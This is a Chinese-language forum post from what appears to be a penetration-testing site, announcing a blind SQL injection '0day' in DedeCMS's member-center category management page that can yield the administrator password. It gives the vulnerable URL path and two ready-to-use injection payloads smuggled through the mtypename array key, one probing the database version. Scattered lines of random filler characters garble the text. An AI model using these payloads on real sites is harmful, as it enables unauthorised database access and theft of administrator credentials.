中国网络渗透测试联盟
标题:
DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码
[打印本页]
作者:
admin
时间:
2012-12-20 08:08
标题:
DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码
需要magic_quotes_gpc = Off,所以说是鸡肋啊.
; @ w: x, M6 {* O: ?2 w
' H5 z6 o% i9 J0 {
2 H$ S' u- @+ ]" i0 S
发生在数组key里的注射漏洞,有点意思.
p- h" L# L. @
6 X1 g5 ]# W! I8 t* K0 d
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
8 O0 h& m6 Z$ ~) u# t
* P2 S2 e/ w c5 x1 M* y
http://www.xxx.com
/dede/member/mtypes.php?dopost=save
* D2 k, g7 e& z4 Z9 p& R% D: h
q4 s- T/ s0 L, u! _
exploit:
, U8 O* \- A D* S4 L
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
, H, \+ ~0 G1 l( e5 r9 X: J8 a
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
$ q# u2 B8 {. ~* H, {
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2